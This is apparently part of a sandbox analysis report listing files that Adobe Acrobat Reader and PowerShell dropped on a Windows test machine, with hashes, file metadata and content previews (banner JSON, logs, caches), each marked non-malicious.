                      SHA-512:8A6C74D03915A9FEC79CF15892BEA2598B84F38377FEABD68505BDAA9BC5B2FEC87F70F68C6F83B55EA9DABDDCC44D3F892448DD3F90CEF5E1E88A850A1FD2EF
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):287
                      Entropy (8bit):5.26747623545143
                      Encrypted:false
                      SSDEEP:
                      MD5:0D333F7A258BB7EAD333BBF239A5E37D
                      SHA1:9752C5C0FF196F713D246B98B986899BA45C1BA9
                      SHA-256:EDE2A37E0ECB892A64E203FADFC6B0F69359DA1028C47A557B999FECE46FB1AC
                      SHA-512:779CC876DC791DB4DC90DF6F6B360557813C00170B05213A74CC40E978BF654B1EAF1971E9CA89AE335D7867D912C0E85C44DDAE650F4613B5C4A0EF36911D3E
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1090
                      Entropy (8bit):5.662642531386874
                      Encrypted:false
                      SSDEEP:
                      MD5:0146CFC420D45FD2495496AD3D927EBB
                      SHA1:487A26CC8A64C39CE4E33A00D33FF58884B85DD4
                      SHA-256:36FD4972F5F29B0DBACF495BF3CDB9AA15770AD195B2093307DD2BC5143E301D
                      SHA-512:6931AA6DF6CFFABC3C700AFABACA96E6C6EC6DBFDEFE015996E57BFD1A64D3102E58E507DCB64DB5F07825D440380EC8AFF09832054DAB2748D891E393A645A7
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):286
                      Entropy (8bit):5.2424495631071935
                      Encrypted:false
                      SSDEEP:
                      MD5:F0DFD257B5DCDCE6B6551C621D519535
                      SHA1:50F12B1028C40B0A386E1459D792ADA65F0CB990
                      SHA-256:EDA1D291442AF10795627D10AB4FDC0ABF6805ADCCD2F6F1F6F0277BF4001BC1
                      SHA-512:90B70D0D4AFEBD3C5DDDAB5BE16080EB854A0599FDB2B1E00A1D03BA5D64DFC1D2108FF99298FE889E4E8030CA97F410D68EB1DA98CE3B52AB08A096D7AE89B1
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):282
                      Entropy (8bit):5.249390280480067
                      Encrypted:false
                      SSDEEP:
                      MD5:406540115801606BA0D97DBD0693EA23
                      SHA1:31E76AB8795349807F1FB51D15A8687F5AF3CCAB
                      SHA-256:AFEBE67DA91BE456943C91EAD96C94FC8A8CABD352F2441E29FC57966C2EEECC
                      SHA-512:DCE62316EEE8CA29589E690036843AD9A46716A39AF48C415DD6AE7C9364A88BE25976F24D93581B57A46613FCDFBF74662ABCC04ABAA39BDDB5867269DA73BE
                      Malicious:false
                      Reputation:unknown
                      Preview:{"analyticsData":{"responseGUID":"f3d7f2a1-460d-452c-aee5-8ece19da552b","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1734022711094,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4
                      Entropy (8bit):0.8112781244591328
                      Encrypted:false
                      SSDEEP:
                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                      Malicious:false
                      Reputation:unknown
                      Preview:....

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):2814
                      Entropy (8bit):5.138398070106111
                      Encrypted:false
                      SSDEEP:
                      MD5:56024C2B0210664F746508F113693CAF
                      SHA1:DC0DD350BDEF193E7FFF7C7997B0646964C9131F
                      SHA-256:E86631D95D4A959A5204D1014D89E9167D46B2D2C48B558FEE7653E2E1DF037E
                      SHA-512:FAD18A502EC0EB27059990CDF791168FD4423C8EDA7788C63E4E0B85C0F7CBEE11CDE4EBF23F9A35362A4A04960BAC6F97A156C31547131593E7E67EF436DF4A
                      Malicious:false
                      Reputation:unknown
                      Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e4a923412dca3220dcf3fb0be67b7bcf","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1733843116000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"2f187d8be72c3a713361e33dc5196037","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1733843115000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"fe15992cacc18ab4304950da16333e4f","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1733843115000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"fe0027a401dcfda9433c28c44511c10f","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1733843115000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"b8a6afb86e50983cf83524a5558a84c7","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1733843115000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"ecc4e06a1ead0a996841c272523fac3d","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 23
                      Category:dropped
                      Size (bytes):12288
                      Entropy (8bit):1.3560577804470426
                      Encrypted:false
                      SSDEEP:
                      MD5:0689029943E74A685A80C6DEEDFD9E09
                      SHA1:7652F9677239F87E21FBEB3604F645FBD1C4456E
                      SHA-256:23F537605CF53340080C304BC7E0D532BC3AFB03244E4639B9773665EA6C284D
                      SHA-512:23DCA1677C80FB9C41591AA8AD9998104BEC7EEB8A2F58F34C3B4780279A2CB5FD646BB4FD48BEDE688ACB63641A39DA1AC4C608B681AD71242CB8C1DDF69035
                      Malicious:false
                      Reputation:unknown
                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite Rollback Journal
                      Category:dropped
                      Size (bytes):8720
                      Entropy (8bit):1.831394115609247
                      Encrypted:false
                      SSDEEP:
                      MD5:698CC9BEA6C1030A6810F7E38D187408
                      SHA1:EAB7EEA557DC6AA508749D0C06E8C66FD24AEBC8
                      SHA-256:4B7F9501E5D0D265B26B052D9302C0DA2BCF9E91BEEF9EAC6D77558C32BC1261
                      SHA-512:0529DC02D72E1813B8DCF7951D84865A8BD0C6BB8F10B4F0B62C9682901A29F2B0B6ACDE2FA988EB1FE262C1B9A5813327050FB7A7CFA8D7013147F5A35E43F2
                      Malicious:false
                      Reputation:unknown
                      Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././.-.-.-.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):66726
                      Entropy (8bit):5.392739213842091
                      Encrypted:false
                      SSDEEP:
                      MD5:8AC7E1848AFCB807027F0D80A9F3BFB3
                      SHA1:FD185F76136F2F47C8D3E61CD4B2EDBCBD27F0A6
                      SHA-256:734E2A0BDA136B30395D3CBF31F9E984B3F2AFBFB2B815D9735104257DB32905
                      SHA-512:EDEB502E2DE1D685C9C3F88743B3B453F8B1C743741BE64DB5CA2FCFFE9A344815BA3E1DCF0DB60960F3AA1776BD89FCB953631751CC26550BA2EF8EE5B43EB7
                      Malicious:false
                      Reputation:unknown
                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):9434
                      Entropy (8bit):4.928515784730612
                      Encrypted:false
                      SSDEEP:
                      MD5:D3594118838EF8580975DDA877E44DEB
                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                      Malicious:false
                      Reputation:unknown
                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):15192
                      Entropy (8bit):5.44655396715591
                      Encrypted:false
                      SSDEEP:
                      MD5:65F932A134F14695E696D906066AC752
                      SHA1:97F13C718D04CA6C9616108EC87CA360EF8285A1
                      SHA-256:1CAE0C5028F04D9536CD4B01FA056D9248F99EDD69BA2B5E65D18909311A25AE
                      SHA-512:8634FDA69C0EC1662A129A0C386DD00C6B5E38436D8AD604BC990EFB6D99786A84F9231EBF94DAA2F51D780264EC250F75FB2AB1856B766BBBBDE9B802163F90
                      Malicious:false
                      Reputation:unknown
                      Preview:@...e................................................@..........H...............o..b~.D.poM...%..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....j.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.,.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                      C:\Users\user\AppData\Local\Temp\MSIb4547.LOG

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):246
                      Entropy (8bit):3.488809521505088
                      Encrypted:false
                      SSDEEP:
                      MD5:045B7DA9E69EB76973A2BE1CBFC89563
                      SHA1:EFEC6E827914687BF0F50BCEBA2163060F86F5B5
                      SHA-256:82E96D0B82F5A7E8AE94EE8AE5F8F8ABD68DE509C011F5868CB0808B0ADDE6BB
                      SHA-512:6ED9C62B1FF4197194FEC93D852463A3C2DC9444F3A477367D3679BE17EC2AC0A2A490AAA8572AD632FEEC130C07A8E34EC331A765BA7BFC6476EC28112EF8FA
                      Malicious:false
                      Reputation:unknown
                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.0./.1.2./.2.0.2.4. . .1.0.:.0.5.:.1.2. .=.=.=.....

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22lnq25m.041.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Reputation:unknown
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-10 10-05-07-359.log

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with very long lines (393)
                      Category:dropped
                      Size (bytes):16525
                      Entropy (8bit):5.359827924713262
                      Encrypted:false
                      SSDEEP:
                      MD5:06DEAEDB81D09FD8FB5FF668D8E09CB2
                      SHA1:28A02BCBD5975117B97A08AFB049F2C94F334726
                      SHA-256:D98DE785425112A2D7A41B16073812FA4FA4955F2D5139AE87C9A5FBC4717D64
                      SHA-512:948E3B56E5A8D818A5FE9D74B82A898F7264909ADF2C49E5D096CB90F4D28ED95990545A4857933F0E06D493AA0F6D41F6109C74B44BC0E4B84346B519681936
                      Malicious:false
                      Reputation:unknown
                      Preview:SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:755+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig:

                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                      Category:dropped
                      Size (bytes):16599
                      Entropy (8bit):5.363481538072107
                      Encrypted:false
                      SSDEEP:
                      MD5:48578253754D28DD590FD370BABEFA46
                      SHA1:EA1C8F86B43F04DE851FB8856A4C2A627E198DDB
                      SHA-256:D1C55431CF7E21BA77DAB5346B044C3470E2C134BF45E090CE0072D003DFA3C1
                      SHA-512:87BEA03619857E899E3649F9E45C6E6FB7378B7618582D53EED174553B8D930A48F53AC377BE524227D815DD44FFDA9375A7A905CF61D2878BF7FAA3CD07DF0A
                      Malicious:false
                      Reputation:unknown
                      Preview:SessionID=b63a5467-9022-4356-944d-73a2c1cf80f4.1733843107369 Timestamp=2024-12-10T10:05:07:369-0500 ThreadID=3760 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b63a5467-9022-4356-944d-73a2c1cf80f4.1733843107369 Timestamp=2024-12-10T10:05:07:371-0500 ThreadID=3760 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b63a5467-9022-4356-944d-73a2c1cf80f4.1733843107369 Timestamp=2024-12-10T10:05:07:371-0500 ThreadID=3760 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b63a5467-9022-4356-944d-73a2c1cf80f4.1733843107369 Timestamp=2024-12-10T10:05:07:371-0500 ThreadID=3760 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b63a5467-9022-4356-944d-73a2c1cf80f4.1733843107369 Timestamp=2024-12-10T10:05:07:372-0500 ThreadID=3760 Component=ngl-lib_NglAppLib Description="SetConf

                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):35814
                      Entropy (8bit):5.417353855578586
                      Encrypted:false
                      SSDEEP:
                      MD5:F4A64FAFC1169680143FF67B61B59751
                      SHA1:934DDCE8A777FE6A0FCDE10171B1B8CF99FFA74A
                      SHA-256:2ACF0AC981B248D6B087684C19DF863C4579256AE659D2E99F3C8C8BFCDEF47F
                      SHA-512:94135E2C438CE05FDC55BD6B50656E289A3667CF8045FB7E491441483412B05D8E40069E89A3613A5805B76350FBD48C97D2E1C34FDCA74F11CF194BCA21CD8E
                      Malicious:false
                      Reputation:unknown
                      Preview:06-10-2023 11:44:59:.---2---..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 11:44:59:.Closing File..06-10-

                      C:\Users\user\AppData\Local\Temp\acrocef_low\5013c460-99f2-4a88-a578-0ce36934cfdf.tmp

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                      Category:dropped
                      Size (bytes):1407294
                      Entropy (8bit):7.97605879016224
                      Encrypted:false
                      SSDEEP:
                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                      Malicious:false
                      Reputation:unknown
                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                      C:\Users\user\AppData\Local\Temp\acrocef_low\6d06d298-d6df-4d21-84d3-6aefb1a84aac.tmp

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                      Category:dropped
                      Size (bytes):758601
                      Entropy (8bit):7.98639316555857
                      Encrypted:false
                      SSDEEP:
                      MD5:3A49135134665364308390AC398006F1
                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                      Malicious:false
                      Reputation:unknown
                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                      C:\Users\user\AppData\Local\Temp\acrocef_low\a0432d0c-5063-42aa-af85-a711b00c48a7.tmp

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                      Category:dropped
                      Size (bytes):1419751
                      Entropy (8bit):7.976496077007677
                      Encrypted:false
                      SSDEEP:
                      MD5:A8E5C37206C98D1B655FF994A420FFB6
                      SHA1:827237782AB5971EC205C3BCECCC7950BE9F84C3
                      SHA-256:F1F755059AF7C2CBC36920337941AEFB18FBDB3CD14D3239CBBBCF0CB8F208EA
                      SHA-512:12DE33EB7624458AEC44D83D4E2C09E626F8E54E177FC0C26EEBA232935F34FAAAEB71FBB025EB7C53BEA9933C46ADCE759C32516D1B80C03B6734C61D61CEB2
                      Malicious:false
                      Reputation:unknown
